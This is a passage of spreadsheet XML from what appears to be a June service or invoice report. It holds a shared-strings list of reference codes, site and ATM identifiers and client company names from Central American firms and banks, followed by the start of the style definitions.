  </si>
  <si>
    <t>F4589919</t>
  </si>
  <si>
    <t>F4589926</t>
  </si>
  <si>
    <t>F4589932</t>
  </si>
  <si>
    <t>F4589935</t>
  </si>
  <si>
    <t>F4605425</t>
  </si>
  <si>
    <t>973238OH</t>
  </si>
  <si>
    <t>367400016T</t>
  </si>
  <si>
    <t>90001905996T</t>
  </si>
  <si>
    <t>F4605460</t>
  </si>
  <si>
    <t>F4605461</t>
  </si>
  <si>
    <t>F4605466</t>
  </si>
  <si>
    <t>265900387T</t>
  </si>
  <si>
    <t>F4605483</t>
  </si>
  <si>
    <t>F4605487</t>
  </si>
  <si>
    <t>361700017T</t>
  </si>
  <si>
    <t>F4605498</t>
  </si>
  <si>
    <t>F4605499</t>
  </si>
  <si>
    <t>F4605516</t>
  </si>
  <si>
    <t>F4605522</t>
  </si>
  <si>
    <t>F4605529</t>
  </si>
  <si>
    <t>F4605534</t>
  </si>
  <si>
    <t>F4605538</t>
  </si>
  <si>
    <t>F4605560</t>
  </si>
  <si>
    <t>F4605562</t>
  </si>
  <si>
    <t>601200005T</t>
  </si>
  <si>
    <t>INTERNACIONAL TECMEDIA, S.A.</t>
  </si>
  <si>
    <t>F4610409</t>
  </si>
  <si>
    <t>F4610410</t>
  </si>
  <si>
    <t>ID1027099SV</t>
  </si>
  <si>
    <t>8200181T</t>
  </si>
  <si>
    <t>F4610441</t>
  </si>
  <si>
    <t>F4610442</t>
  </si>
  <si>
    <t>625900238T</t>
  </si>
  <si>
    <t>F4610444</t>
  </si>
  <si>
    <t>IPG003912SV</t>
  </si>
  <si>
    <t>F4610449</t>
  </si>
  <si>
    <t>F4610450</t>
  </si>
  <si>
    <t>F4610451</t>
  </si>
  <si>
    <t>625900175T</t>
  </si>
  <si>
    <t>F4610455</t>
  </si>
  <si>
    <t>F4610464</t>
  </si>
  <si>
    <t>F4610466</t>
  </si>
  <si>
    <t>F4610467</t>
  </si>
  <si>
    <t>F4610472</t>
  </si>
  <si>
    <t>F4610473</t>
  </si>
  <si>
    <t>636900001T</t>
  </si>
  <si>
    <t>ACOFI ASESORES Y CONSULTORES, S.A.</t>
  </si>
  <si>
    <t>F4610478</t>
  </si>
  <si>
    <t>1726741OH</t>
  </si>
  <si>
    <t>F4610483</t>
  </si>
  <si>
    <t>F4610485</t>
  </si>
  <si>
    <t>297401443T</t>
  </si>
  <si>
    <t>23781900SV</t>
  </si>
  <si>
    <t>F4610495</t>
  </si>
  <si>
    <t>453429ON</t>
  </si>
  <si>
    <t>F4610510</t>
  </si>
  <si>
    <t>776700001T</t>
  </si>
  <si>
    <t>PRODUCTOS Y SERVICIOS INTEGRALES S.A. (PRYSA)</t>
  </si>
  <si>
    <t>F4610534</t>
  </si>
  <si>
    <t>8902351T</t>
  </si>
  <si>
    <t>F4564694</t>
  </si>
  <si>
    <t>90001909287T</t>
  </si>
  <si>
    <t>F4564697</t>
  </si>
  <si>
    <t>90001904245T</t>
  </si>
  <si>
    <t>F4564705</t>
  </si>
  <si>
    <t>7800710T</t>
  </si>
  <si>
    <t>F4564713</t>
  </si>
  <si>
    <t>826900016T</t>
  </si>
  <si>
    <t>F4564729</t>
  </si>
  <si>
    <t>CC_CREDOMATIC_GT_INTERNET_AGENCIA_0053</t>
  </si>
  <si>
    <t>F4564744</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_C105</t>
  </si>
  <si>
    <t>F4564757</t>
  </si>
  <si>
    <t>F4564758</t>
  </si>
  <si>
    <t>296800029T</t>
  </si>
  <si>
    <t>F4564776</t>
  </si>
  <si>
    <t>F4564777</t>
  </si>
  <si>
    <t>F4564778</t>
  </si>
  <si>
    <t>F4564781</t>
  </si>
  <si>
    <t>42700416T</t>
  </si>
  <si>
    <t>F4564787</t>
  </si>
  <si>
    <t>F4564789</t>
  </si>
  <si>
    <t>F4564791</t>
  </si>
  <si>
    <t>CC_DISTELSA_GT_FLORES_DEL_LAGO</t>
  </si>
  <si>
    <t>F4564794</t>
  </si>
  <si>
    <t>90001910426T</t>
  </si>
  <si>
    <t>5578344ON</t>
  </si>
  <si>
    <t>F4564806</t>
  </si>
  <si>
    <t>F4564807</t>
  </si>
  <si>
    <t>826900014T</t>
  </si>
  <si>
    <t>826230OH</t>
  </si>
  <si>
    <t>450713ON</t>
  </si>
  <si>
    <t>877100007T</t>
  </si>
  <si>
    <t>INGRUP, S.A.</t>
  </si>
  <si>
    <t>F4564835</t>
  </si>
  <si>
    <t>F4564836</t>
  </si>
  <si>
    <t>F4564837</t>
  </si>
  <si>
    <t>F4564838</t>
  </si>
  <si>
    <t>F4612131</t>
  </si>
  <si>
    <t>297401053T</t>
  </si>
  <si>
    <t>344400042T</t>
  </si>
  <si>
    <t>F4612138</t>
  </si>
  <si>
    <t>302400004T</t>
  </si>
  <si>
    <t>F4612156</t>
  </si>
  <si>
    <t>F4612157</t>
  </si>
  <si>
    <t>F4612158</t>
  </si>
  <si>
    <t>F4612169</t>
  </si>
  <si>
    <t>F4612170</t>
  </si>
  <si>
    <t>90001909651T</t>
  </si>
  <si>
    <t>AUTO REPUESTOS TORRE FUERTE.</t>
  </si>
  <si>
    <t>F4612186</t>
  </si>
  <si>
    <t>ID1165016SV</t>
  </si>
  <si>
    <t>CRIAVES S. A. DE C. V.</t>
  </si>
  <si>
    <t>F4612190</t>
  </si>
  <si>
    <t>90001901534T</t>
  </si>
  <si>
    <t>EMBOTELLADORES UNIDOS, S.A.</t>
  </si>
  <si>
    <t>CC_BANTRAB_GT_AGENCIA_164</t>
  </si>
  <si>
    <t>21328200SV</t>
  </si>
  <si>
    <t>INVERSIONES LEMUS</t>
  </si>
  <si>
    <t>F4612203</t>
  </si>
  <si>
    <t>60900013T</t>
  </si>
  <si>
    <t>CC_GYT_GT_INTERNET_CONDADO_NARANJO</t>
  </si>
  <si>
    <t>F4612220</t>
  </si>
  <si>
    <t>551300001T</t>
  </si>
  <si>
    <t>ALIMENTOS ORGANICOS S.A.</t>
  </si>
  <si>
    <t>F4612227</t>
  </si>
  <si>
    <t>F4612230</t>
  </si>
  <si>
    <t>F4612232</t>
  </si>
  <si>
    <t>F4612236</t>
  </si>
  <si>
    <t>F4612250</t>
  </si>
  <si>
    <t>F4612258</t>
  </si>
  <si>
    <t>8901777T</t>
  </si>
  <si>
    <t>F4621739</t>
  </si>
  <si>
    <t>F4621741</t>
  </si>
  <si>
    <t>F4621742</t>
  </si>
  <si>
    <t>CC_BANCO_AGRICOLA_SV_ATM_CEPA_ACAJUTLA</t>
  </si>
  <si>
    <t>F4621743</t>
  </si>
  <si>
    <t>282800039T</t>
  </si>
  <si>
    <t>F4621752</t>
  </si>
  <si>
    <t>F4621759</t>
  </si>
  <si>
    <t>F4621767</t>
  </si>
  <si>
    <t>90001909345T</t>
  </si>
  <si>
    <t>F4621778</t>
  </si>
  <si>
    <t>806300312T</t>
  </si>
  <si>
    <t>F4621788</t>
  </si>
  <si>
    <t>F4621792</t>
  </si>
  <si>
    <t>F4621798</t>
  </si>
  <si>
    <t>934621OH</t>
  </si>
  <si>
    <t>1747951OH</t>
  </si>
  <si>
    <t>OH1000578360</t>
  </si>
  <si>
    <t>F4621821</t>
  </si>
  <si>
    <t>F4621822</t>
  </si>
  <si>
    <t>F4621837</t>
  </si>
  <si>
    <t>F4621841</t>
  </si>
  <si>
    <t>90001908408T</t>
  </si>
  <si>
    <t>F4621845</t>
  </si>
  <si>
    <t>F4621863</t>
  </si>
  <si>
    <t>F4621864</t>
  </si>
  <si>
    <t>F4544965</t>
  </si>
  <si>
    <t>F4545075</t>
  </si>
  <si>
    <t>F4545083</t>
  </si>
  <si>
    <t>34700013T</t>
  </si>
  <si>
    <t>MOLINOS MODERNOS, S.A.</t>
  </si>
  <si>
    <t>630200008T</t>
  </si>
  <si>
    <t>F4564216</t>
  </si>
  <si>
    <t>F4564235</t>
  </si>
  <si>
    <t>F4564246</t>
  </si>
  <si>
    <t>F4564250</t>
  </si>
  <si>
    <t>F4564261</t>
  </si>
  <si>
    <t>F4564266</t>
  </si>
  <si>
    <t>F4564267</t>
  </si>
  <si>
    <t>F4564268</t>
  </si>
  <si>
    <t>F4564271</t>
  </si>
  <si>
    <t>F4564286</t>
  </si>
  <si>
    <t>F4564294</t>
  </si>
  <si>
    <t>F4564308</t>
  </si>
  <si>
    <t>F4564342</t>
  </si>
  <si>
    <t>F4564349</t>
  </si>
  <si>
    <t>F4564354</t>
  </si>
  <si>
    <t>F4591133</t>
  </si>
  <si>
    <t>F4591204</t>
  </si>
  <si>
    <t>F4591253</t>
  </si>
  <si>
    <t>F4591263</t>
  </si>
  <si>
    <t>F4591268</t>
  </si>
  <si>
    <t>F4591273</t>
  </si>
  <si>
    <t>3264188ON</t>
  </si>
  <si>
    <t>F4591278</t>
  </si>
  <si>
    <t>F4600527</t>
  </si>
  <si>
    <t>F4600557</t>
  </si>
  <si>
    <t>CC_WALMART_UTILITARIOS_GT_TIENDA_145</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_INTERNET_AGENCIA_0018</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_SUC000811</t>
  </si>
  <si>
    <t>F4600579</t>
  </si>
  <si>
    <t>604000001T</t>
  </si>
  <si>
    <t>FOTOS Y CONVENIENCIA, S.A.</t>
  </si>
  <si>
    <t>F4539860</t>
  </si>
  <si>
    <t>F4539871</t>
  </si>
  <si>
    <t>F4539887</t>
  </si>
  <si>
    <t>F4590613</t>
  </si>
  <si>
    <t>F4590621</t>
  </si>
  <si>
    <t>F4590624</t>
  </si>
  <si>
    <t>892000003T</t>
  </si>
  <si>
    <t>F4590630</t>
  </si>
  <si>
    <t>F4590634</t>
  </si>
  <si>
    <t>F4590635</t>
  </si>
  <si>
    <t>F4590645</t>
  </si>
  <si>
    <t>F4590651</t>
  </si>
  <si>
    <t>F4590656</t>
  </si>
  <si>
    <t>F4590657</t>
  </si>
  <si>
    <t>F4590665</t>
  </si>
  <si>
    <t>F4590666</t>
  </si>
  <si>
    <t>770600068T</t>
  </si>
  <si>
    <t>IP2282006SV</t>
  </si>
  <si>
    <t>F4590683</t>
  </si>
  <si>
    <t>F4590692</t>
  </si>
  <si>
    <t>F4590707</t>
  </si>
  <si>
    <t>F4590717</t>
  </si>
  <si>
    <t>F4590725</t>
  </si>
  <si>
    <t>F4590726</t>
  </si>
  <si>
    <t>F4590728</t>
  </si>
  <si>
    <t>F4590738</t>
  </si>
  <si>
    <t>F4590744</t>
  </si>
  <si>
    <t>47503848T</t>
  </si>
  <si>
    <t>F4605733</t>
  </si>
  <si>
    <t>5531535ON</t>
  </si>
  <si>
    <t>F4605743</t>
  </si>
  <si>
    <t>1744920OH</t>
  </si>
  <si>
    <t>47503876T</t>
  </si>
  <si>
    <t>F4605760</t>
  </si>
  <si>
    <t>8901751T</t>
  </si>
  <si>
    <t>1744853OH</t>
  </si>
  <si>
    <t>F4605778</t>
  </si>
  <si>
    <t>F4605787</t>
  </si>
  <si>
    <t>344400219T</t>
  </si>
  <si>
    <t>F4605788</t>
  </si>
  <si>
    <t>F4605791</t>
  </si>
  <si>
    <t>F4605797</t>
  </si>
  <si>
    <t>90001906735T</t>
  </si>
  <si>
    <t>F4605811</t>
  </si>
  <si>
    <t>F4605813</t>
  </si>
  <si>
    <t>F4605818</t>
  </si>
  <si>
    <t>F4605821</t>
  </si>
  <si>
    <t>F4605830</t>
  </si>
  <si>
    <t>F4605833</t>
  </si>
  <si>
    <t>F4605877</t>
  </si>
  <si>
    <t>F4610683</t>
  </si>
  <si>
    <t>F4610690</t>
  </si>
  <si>
    <t>F4610695</t>
  </si>
  <si>
    <t>F4610704</t>
  </si>
  <si>
    <t>F4610711</t>
  </si>
  <si>
    <t>8200146T</t>
  </si>
  <si>
    <t>IP2053046SV</t>
  </si>
  <si>
    <t>F4610734</t>
  </si>
  <si>
    <t>3801266ON</t>
  </si>
  <si>
    <t>ON0000223083/CUKRA DEVELOPMENT CORPORATION S. A.     -</t>
  </si>
  <si>
    <t>F4610741</t>
  </si>
  <si>
    <t>F4610742</t>
  </si>
  <si>
    <t>F4610745</t>
  </si>
  <si>
    <t>F4610749</t>
  </si>
  <si>
    <t>F4610750</t>
  </si>
  <si>
    <t>F4610754</t>
  </si>
  <si>
    <t>860400004T</t>
  </si>
  <si>
    <t>1036946OH</t>
  </si>
  <si>
    <t>695300001T</t>
  </si>
  <si>
    <t>EL CHINITO VELOZ</t>
  </si>
  <si>
    <t>F4610791</t>
  </si>
  <si>
    <t>F4610796</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM3636</t>
  </si>
  <si>
    <t>889500002T</t>
  </si>
  <si>
    <t>MINISTERIO DE RELACIONES EXTERIORES..</t>
  </si>
  <si>
    <t>F4610805</t>
  </si>
  <si>
    <t>F4610806</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM3639</t>
  </si>
  <si>
    <t>806300168T</t>
  </si>
  <si>
    <t>555600001T</t>
  </si>
  <si>
    <t>SIECA.</t>
  </si>
  <si>
    <t>F4610820</t>
  </si>
  <si>
    <t>F4610822</t>
  </si>
  <si>
    <t>F4565405</t>
  </si>
  <si>
    <t>413500005T</t>
  </si>
  <si>
    <t>GESTION EMPRESARIAL DE GUATEMALA S.A.</t>
  </si>
  <si>
    <t>F4565416</t>
  </si>
  <si>
    <t>726700002T</t>
  </si>
  <si>
    <t>INA</t>
  </si>
  <si>
    <t>F4565418</t>
  </si>
  <si>
    <t>CC_BANTRAB_GT_KIO_NETWORKS_MIXCO</t>
  </si>
  <si>
    <t>F4565419</t>
  </si>
  <si>
    <t>CC_BAM_GT_AGENCIA_162</t>
  </si>
  <si>
    <t>F4565420</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_INTERNET_C192</t>
  </si>
  <si>
    <t>F4565421</t>
  </si>
  <si>
    <t>F4565422</t>
  </si>
  <si>
    <t>F4565423</t>
  </si>
  <si>
    <t>F4565424</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_0436</t>
  </si>
  <si>
    <t>F4565425</t>
  </si>
  <si>
    <t>F4565426</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM2881</t>
  </si>
  <si>
    <t>F4565427</t>
  </si>
  <si>
    <t>F4565428</t>
  </si>
  <si>
    <t>F4565429</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_TECPAN</t>
  </si>
  <si>
    <t>F4565430</t>
  </si>
  <si>
    <t>237400045T</t>
  </si>
  <si>
    <t>F4565431</t>
  </si>
  <si>
    <t>F4565432</t>
  </si>
  <si>
    <t>F4565433</t>
  </si>
  <si>
    <t>F4565434</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM3183</t>
  </si>
  <si>
    <t>F4565435</t>
  </si>
  <si>
    <t>F4565436</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_4219</t>
  </si>
  <si>
    <t>F4565437</t>
  </si>
  <si>
    <t>F4565438</t>
  </si>
  <si>
    <t>F4565439</t>
  </si>
  <si>
    <t>CC_GYT_GT_AGENCIA_288</t>
  </si>
  <si>
    <t>F4565440</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM0113</t>
  </si>
  <si>
    <t>F4565441</t>
  </si>
  <si>
    <t>F4565442</t>
  </si>
  <si>
    <t>F4565443</t>
  </si>
  <si>
    <t>F4565444</t>
  </si>
  <si>
    <t>CC_FENACOAC_GT_TECULUTAN_ZACAPA</t>
  </si>
  <si>
    <t>F4565445</t>
  </si>
  <si>
    <t>F4565446</t>
  </si>
  <si>
    <t>F4565447</t>
  </si>
  <si>
    <t>F4565448</t>
  </si>
  <si>
    <t>F4565450</t>
  </si>
  <si>
    <t>F4565451</t>
  </si>
  <si>
    <t>F4565452</t>
  </si>
  <si>
    <t>F4565453</t>
  </si>
  <si>
    <t>F4565454</t>
  </si>
  <si>
    <t>F4565455</t>
  </si>
  <si>
    <t>CC_BANCO_AGRICOLA_SV_ATM_DDJ_PALMAR</t>
  </si>
  <si>
    <t>F4565456</t>
  </si>
  <si>
    <t>F4565457</t>
  </si>
  <si>
    <t>F4565458</t>
  </si>
  <si>
    <t>F4565459</t>
  </si>
  <si>
    <t>F4565460</t>
  </si>
  <si>
    <t>F4565461</t>
  </si>
  <si>
    <t>F4565462</t>
  </si>
  <si>
    <t>F4565463</t>
  </si>
  <si>
    <t>F4565464</t>
  </si>
  <si>
    <t>CC_TYT_GT_GT_ATM_4826</t>
  </si>
  <si>
    <t>F4565465</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_C148</t>
  </si>
  <si>
    <t>F4565466</t>
  </si>
  <si>
    <t>F4565467</t>
  </si>
  <si>
    <t>F4565468</t>
  </si>
  <si>
    <t>8901375T</t>
  </si>
  <si>
    <t>F4565469</t>
  </si>
  <si>
    <t>F4565470</t>
  </si>
  <si>
    <t>F4565471</t>
  </si>
  <si>
    <t>F4565472</t>
  </si>
  <si>
    <t>F4565473</t>
  </si>
  <si>
    <t>F4565474</t>
  </si>
  <si>
    <t>F4565475</t>
  </si>
  <si>
    <t>CC_BANCO_AZTECA_SV_SANTA_ROSA_DE_LIMA</t>
  </si>
  <si>
    <t>F4565476</t>
  </si>
  <si>
    <t>F4565477</t>
  </si>
  <si>
    <t>F4565478</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM2334</t>
  </si>
  <si>
    <t>F4565479</t>
  </si>
  <si>
    <t>F4565480</t>
  </si>
  <si>
    <t>F4565481</t>
  </si>
  <si>
    <t>F4565482</t>
  </si>
  <si>
    <t>F4565483</t>
  </si>
  <si>
    <t>F4565484</t>
  </si>
  <si>
    <t>F4565485</t>
  </si>
  <si>
    <t>F4565486</t>
  </si>
  <si>
    <t>F4565487</t>
  </si>
  <si>
    <t>F4565488</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_INTERNET_C115</t>
  </si>
  <si>
    <t>F4565489</t>
  </si>
  <si>
    <t>F4565490</t>
  </si>
  <si>
    <t>F4565491</t>
  </si>
  <si>
    <t>F4565492</t>
  </si>
  <si>
    <t>47503594T</t>
  </si>
  <si>
    <t>F4565493</t>
  </si>
  <si>
    <t>F4565494</t>
  </si>
  <si>
    <t>8902566T</t>
  </si>
  <si>
    <t>F4565495</t>
  </si>
  <si>
    <t>F4565496</t>
  </si>
  <si>
    <t>F4565497</t>
  </si>
  <si>
    <t>F4565498</t>
  </si>
  <si>
    <t>F4565499</t>
  </si>
  <si>
    <t>F4612264</t>
  </si>
  <si>
    <t>F4612269</t>
  </si>
  <si>
    <t>F4612276</t>
  </si>
  <si>
    <t>F4612277</t>
  </si>
  <si>
    <t>F4612278</t>
  </si>
  <si>
    <t>892000005T</t>
  </si>
  <si>
    <t>F4612280</t>
  </si>
  <si>
    <t>4571956ON</t>
  </si>
  <si>
    <t>265900390T</t>
  </si>
  <si>
    <t>F4612292</t>
  </si>
  <si>
    <t>F4612294</t>
  </si>
  <si>
    <t>F4612297</t>
  </si>
  <si>
    <t>F4612298</t>
  </si>
  <si>
    <t>F4612305</t>
  </si>
  <si>
    <t>333600077T</t>
  </si>
  <si>
    <t>F4612306</t>
  </si>
  <si>
    <t>F4612307</t>
  </si>
  <si>
    <t>F4612309</t>
  </si>
  <si>
    <t>64000042T</t>
  </si>
  <si>
    <t>F4612318</t>
  </si>
  <si>
    <t>F4612322</t>
  </si>
  <si>
    <t>F4612325</t>
  </si>
  <si>
    <t>F4612327</t>
  </si>
  <si>
    <t>64000070T</t>
  </si>
  <si>
    <t>F4612343</t>
  </si>
  <si>
    <t>F4612344</t>
  </si>
  <si>
    <t>65300032T</t>
  </si>
  <si>
    <t>64000049T</t>
  </si>
  <si>
    <t>237400055T</t>
  </si>
  <si>
    <t>F4612364</t>
  </si>
  <si>
    <t>F4612365</t>
  </si>
  <si>
    <t>249600037T</t>
  </si>
  <si>
    <t>F4612373</t>
  </si>
  <si>
    <t>F4612387</t>
  </si>
  <si>
    <t>1724869OH</t>
  </si>
  <si>
    <t>OH1001078035</t>
  </si>
  <si>
    <t>305100016T</t>
  </si>
  <si>
    <t>F4622049</t>
  </si>
  <si>
    <t>F4622052</t>
  </si>
  <si>
    <t>F4622056</t>
  </si>
  <si>
    <t>F4622069</t>
  </si>
  <si>
    <t>F4622077</t>
  </si>
  <si>
    <t>24511630SV</t>
  </si>
  <si>
    <t>F4622097</t>
  </si>
  <si>
    <t>22503050SV</t>
  </si>
  <si>
    <t>BUKELE QUINTANILLA EMERSON GERARDO</t>
  </si>
  <si>
    <t>F4622139</t>
  </si>
  <si>
    <t>4448651ON</t>
  </si>
  <si>
    <t>F4622154</t>
  </si>
  <si>
    <t>8902047T</t>
  </si>
  <si>
    <t>F4622166</t>
  </si>
  <si>
    <t>CONTR0000768185</t>
  </si>
  <si>
    <t>F4545336</t>
  </si>
  <si>
    <t>F4545406</t>
  </si>
  <si>
    <t>F4565131</t>
  </si>
  <si>
    <t>F4565135</t>
  </si>
  <si>
    <t>90001908269T</t>
  </si>
  <si>
    <t>90001910457T</t>
  </si>
  <si>
    <t>924114OH</t>
  </si>
  <si>
    <t>F4565167</t>
  </si>
  <si>
    <t>F4565185</t>
  </si>
  <si>
    <t>F4565191</t>
  </si>
  <si>
    <t>F4565192</t>
  </si>
  <si>
    <t>304600004T</t>
  </si>
  <si>
    <t>F4565199</t>
  </si>
  <si>
    <t>21324400SV</t>
  </si>
  <si>
    <t>ASOCIACION SALVADOREÑA EMPRESAS DE SEGUROS</t>
  </si>
  <si>
    <t>F4565214</t>
  </si>
  <si>
    <t>F4565226</t>
  </si>
  <si>
    <t>665991OH</t>
  </si>
  <si>
    <t>OH1000606746</t>
  </si>
  <si>
    <t>F4565242</t>
  </si>
  <si>
    <t>F4565243</t>
  </si>
  <si>
    <t>F4565245</t>
  </si>
  <si>
    <t>F4565247</t>
  </si>
  <si>
    <t>F4565249</t>
  </si>
  <si>
    <t>F4565252</t>
  </si>
  <si>
    <t>F4565253</t>
  </si>
  <si>
    <t>F4565258</t>
  </si>
  <si>
    <t>F4592699</t>
  </si>
  <si>
    <t>47503699T</t>
  </si>
  <si>
    <t>F4592706</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM1842</t>
  </si>
  <si>
    <t>344400553T</t>
  </si>
  <si>
    <t>234700003T</t>
  </si>
  <si>
    <t>AGENCIA ESPA?OLA DE COOPERACION INTERNACIONAL PARA EL DESARROLLO</t>
  </si>
  <si>
    <t>F4592721</t>
  </si>
  <si>
    <t>F4592722</t>
  </si>
  <si>
    <t>F4592726</t>
  </si>
  <si>
    <t>F4592727</t>
  </si>
  <si>
    <t>547400006T</t>
  </si>
  <si>
    <t>F4592729</t>
  </si>
  <si>
    <t>F4592739</t>
  </si>
  <si>
    <t>F4592743</t>
  </si>
  <si>
    <t>F4592746</t>
  </si>
  <si>
    <t>IP2142021SV</t>
  </si>
  <si>
    <t>F4592750</t>
  </si>
  <si>
    <t>F4592766</t>
  </si>
  <si>
    <t>877329OC</t>
  </si>
  <si>
    <t>F4592772</t>
  </si>
  <si>
    <t>F4592773</t>
  </si>
  <si>
    <t>IP2268000SV</t>
  </si>
  <si>
    <t>IP2168061SV</t>
  </si>
  <si>
    <t>F4592791</t>
  </si>
  <si>
    <t>90001800925T</t>
  </si>
  <si>
    <t>408600009T</t>
  </si>
  <si>
    <t>TELECOMUNICA S.A.</t>
  </si>
  <si>
    <t>F4592796</t>
  </si>
  <si>
    <t>291900002T</t>
  </si>
  <si>
    <t>F4592809</t>
  </si>
  <si>
    <t>90001902789T</t>
  </si>
  <si>
    <t>90001911124T</t>
  </si>
  <si>
    <t>F4600723</t>
  </si>
  <si>
    <t>F4600787</t>
  </si>
  <si>
    <t>F4600802</t>
  </si>
  <si>
    <t>F4600826</t>
  </si>
  <si>
    <t>ID1182046SV</t>
  </si>
  <si>
    <t>ZONA FRANCA EL PEDREGAL, S.A</t>
  </si>
  <si>
    <t>1058713OH</t>
  </si>
  <si>
    <t>OH1000168698/RESUELVA HONDURAS -</t>
  </si>
  <si>
    <t>IP2064060SV</t>
  </si>
  <si>
    <t>F4600842</t>
  </si>
  <si>
    <t>F4600844</t>
  </si>
  <si>
    <t>F4600845</t>
  </si>
  <si>
    <t>F4600846</t>
  </si>
  <si>
    <t>F4600848</t>
  </si>
  <si>
    <t>F4600869</t>
  </si>
  <si>
    <t>F4590785</t>
  </si>
  <si>
    <t>F4590786</t>
  </si>
  <si>
    <t>518100002T</t>
  </si>
  <si>
    <t>INVERSIONES JABEL TINAMIT, S.A.</t>
  </si>
  <si>
    <t>551500004T</t>
  </si>
  <si>
    <t>340500127T</t>
  </si>
  <si>
    <t>F4590834</t>
  </si>
  <si>
    <t>365400001T</t>
  </si>
  <si>
    <t>1387317OH</t>
  </si>
  <si>
    <t>F4590838</t>
  </si>
  <si>
    <t>4095527ON</t>
  </si>
  <si>
    <t>535200062T</t>
  </si>
  <si>
    <t>F4590852</t>
  </si>
  <si>
    <t>F4590885</t>
  </si>
  <si>
    <t>F4590887</t>
  </si>
  <si>
    <t>F4590906</t>
  </si>
  <si>
    <t>F4590919</t>
  </si>
  <si>
    <t>F4590920</t>
  </si>
  <si>
    <t>F4590921</t>
  </si>
  <si>
    <t>F4590927</t>
  </si>
  <si>
    <t>F4605909</t>
  </si>
  <si>
    <t>F4605913</t>
  </si>
  <si>
    <t>F4605929</t>
  </si>
  <si>
    <t>F4605955</t>
  </si>
  <si>
    <t>F4605977</t>
  </si>
  <si>
    <t>F4605983</t>
  </si>
  <si>
    <t>F4610997</t>
  </si>
  <si>
    <t>802800008T</t>
  </si>
  <si>
    <t>F4611001</t>
  </si>
  <si>
    <t>F4611006</t>
  </si>
  <si>
    <t>672700006T</t>
  </si>
  <si>
    <t>673000035T</t>
  </si>
  <si>
    <t>F4611017</t>
  </si>
  <si>
    <t>8902039T</t>
  </si>
  <si>
    <t>90001905926T</t>
  </si>
  <si>
    <t>F4611043</t>
  </si>
  <si>
    <t>806300378T</t>
  </si>
  <si>
    <t>F4611055</t>
  </si>
  <si>
    <t>F4611059</t>
  </si>
  <si>
    <t>402100002T</t>
  </si>
  <si>
    <t>RED GLOBAL S.A.</t>
  </si>
  <si>
    <t>647300001T</t>
  </si>
  <si>
    <t>ASEGURADORA LA CEIBA, S.A.</t>
  </si>
  <si>
    <t>F4611073</t>
  </si>
  <si>
    <t>F4611077</t>
  </si>
  <si>
    <t>F4611078</t>
  </si>
  <si>
    <t>F4611083</t>
  </si>
  <si>
    <t>F4611084</t>
  </si>
  <si>
    <t>90001904198T</t>
  </si>
  <si>
    <t>F4611096</t>
  </si>
  <si>
    <t>F4611115</t>
  </si>
  <si>
    <t>F4611118</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_4282</t>
  </si>
  <si>
    <t>5109720ON</t>
  </si>
  <si>
    <t>ON0000206221/UNILEVER DE CENTROAMERICA, S.A.         -</t>
  </si>
  <si>
    <t>F4568701</t>
  </si>
  <si>
    <t>F4568772</t>
  </si>
  <si>
    <t>F4568782</t>
  </si>
  <si>
    <t>F4568812</t>
  </si>
  <si>
    <t>IP2124291SV</t>
  </si>
  <si>
    <t>PRIMER BANCO DE LOS TRABAJADORES DE SANTA ANA</t>
  </si>
  <si>
    <t>F4568815</t>
  </si>
  <si>
    <t>IPG000275SV</t>
  </si>
  <si>
    <t>F4568826</t>
  </si>
  <si>
    <t>F4568829</t>
  </si>
  <si>
    <t>F4568830</t>
  </si>
  <si>
    <t>IP2072010SV</t>
  </si>
  <si>
    <t>F4568835</t>
  </si>
  <si>
    <t>F4568836</t>
  </si>
  <si>
    <t>F4568840</t>
  </si>
  <si>
    <t>IP2170007SV</t>
  </si>
  <si>
    <t>F4568846</t>
  </si>
  <si>
    <t>F4568851</t>
  </si>
  <si>
    <t>F4568882</t>
  </si>
  <si>
    <t>F4568886</t>
  </si>
  <si>
    <t>Total 6</t>
  </si>
  <si>
    <t xml:space="preserve"> JUNIO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00000000"/>
    <numFmt numFmtId="165" formatCode="dddd\ dd\-mm\-yyyy"/>
    <numFmt numFmtId="166" formatCode="d/mm/yyyy\ hh:mm:ss"/>
    <numFmt numFmtId="167" formatCode="m/d/yyyy\ h:mm\ AM/PM"/>
    <numFmt numFmtId="168" formatCode="m/d/yyyy"/>
    <numFmt numFmtId="169" formatCode="0.0000000"/>
  </numFmts>
  <fonts count="38">
    <font>
      <sz val="11"/>
      <color indexed="8"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="8"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="8"/>
      <color indexed="8"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="9"/>
      <color indexed="8"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color indexed="8"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="20"/>
      <color indexed="8"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="14"/>
      <color indexed="8"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color theme="0"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
